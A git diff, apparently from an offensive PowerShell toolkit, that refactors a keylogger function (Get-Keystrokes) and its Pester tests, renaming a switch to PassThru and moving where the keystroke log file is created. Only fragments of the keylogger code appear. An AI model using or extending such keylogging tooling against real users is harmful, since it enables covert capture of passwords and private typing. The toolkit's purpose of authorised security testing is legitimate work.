diff options
| -rw-r--r-- | Exfiltration/Get-Keystrokes.ps1 | 19 | ||||
| -rw-r--r-- | Tests/Exfiltration.tests.ps1 | 13 |
2 files changed, 18 insertions, 14 deletions
diff --git a/Exfiltration/Get-Keystrokes.ps1 b/Exfiltration/Get-Keystrokes.ps1 index cc6b7a9..9e8698c 100644 --- a/Exfiltration/Get-Keystrokes.ps1 +++ b/Exfiltration/Get-Keystrokes.ps1 @@ -19,6 +19,10 @@ function Get-Keystrokes { Specifies the interval in minutes to capture keystrokes. By default, keystrokes are captured indefinitely. +.PARAMETER PassThru + + Returns the keylogger's PowerShell object, so that it may manipulated (disposed) by the user; primarily for testing purposes. + .EXAMPLE Get-Keystrokes -LogPath C:\key.log @@ -36,18 +40,21 @@ function Get-Keystrokes { [CmdletBinding()] Param ( [Parameter(Position = 0)] - [ValidateScript({Test-Path (Resolve-Path (Split-Path -Parent $_)) -PathType Container})] - [String]$LogPath = "$($Env:TEMP)\key.log", + [ValidateScript({(Test-Path (Resolve-Path (Split-Path -Parent -Path $_)) -PathType Container)})] + [String]$LogPath = "$($env:TEMP)\key.log", [Parameter(Position = 1)] [Double]$Timeout, [Parameter()] - [Switch]$Return + [Switch]$PassThru ) $LogPath = Join-Path (Resolve-Path (Split-Path -Parent $LogPath)) (Split-Path -Leaf $LogPath) + try { '"TypedKey","WindowTitle","Time"' | Out-File -FilePath $LogPath -Encoding unicode } + catch { throw $_ } + $Script = { Param ( [Parameter(Position = 0)] @@ -157,8 +164,6 @@ function Get-Keystrokes { #endregion Imports - '"TypedKey","WindowTitle","Time"' | Out-File -FilePath $LogPath -Encoding unicode - $CallbackScript = { Param ( [Parameter()] @@ -368,5 +373,5 @@ function Get-Keystrokes { # Start KeyLogger [void]$PowerShell.BeginInvoke() - if ($Return.IsPresent) { return $PowerShell } -} + if ($PassThru.IsPresent) { return $PowerShell } +}
\ No newline at end of file diff --git a/Tests/Exfiltration.tests.ps1 b/Tests/Exfiltration.tests.ps1 index 30e2f53..e4f60d5 100644 --- a/Tests/Exfiltration.tests.ps1 +++ b/Tests/Exfiltration.tests.ps1 @@ -15,20 +15,19 @@ Describe 'Get-Keystrokes' { $Shell = New-Object -ComObject wscript.shell $Shell.AppActivate($WindowTitle) - $KeyLogger = Get-Keystrokes -Return + $KeyLogger = Get-Keystrokes -PassThru Start-Sleep -Seconds 1 - $Shell.SendKeys('Pester is SUPER l337!') + $Shell.SendKeys("Pester`b`b`b`b`b`b") $KeyLogger.Dispose() It 'Should output to file' { Test-Path "$($env:TEMP)\key.log" | Should Be $true } $KeyObjects = Get-Content -Path "$($env:TEMP)\key.log" | ConvertFrom-Csv - It 'Should log all keystrokes' { - $Keys = $KeyObjects | % { $_.TypedKey } - $String = -join $Keys - $String | Should Be '<Shift>Pester< >is< ><Shift>S<Shift>U<Shift>P<Shift>E<Shift>R< >l337<Shift>!' + It 'Should log keystrokes' { + $FileLength = (Get-Item "$($env:TEMP)\key.log").Length + $FileLength | Should BeGreaterThan 14 } It 'Should get foreground window title' { @@ -43,7 +42,7 @@ Describe 'Get-Keystrokes' { It 'Should stop logging after timeout' { $Timeout = 0.05 - $KeyLogger = Get-Keystrokes -Timeout $Timeout -Return + $KeyLogger = Get-Keystrokes -Timeout $Timeout -PassThru Start-Sleep -Seconds 4 |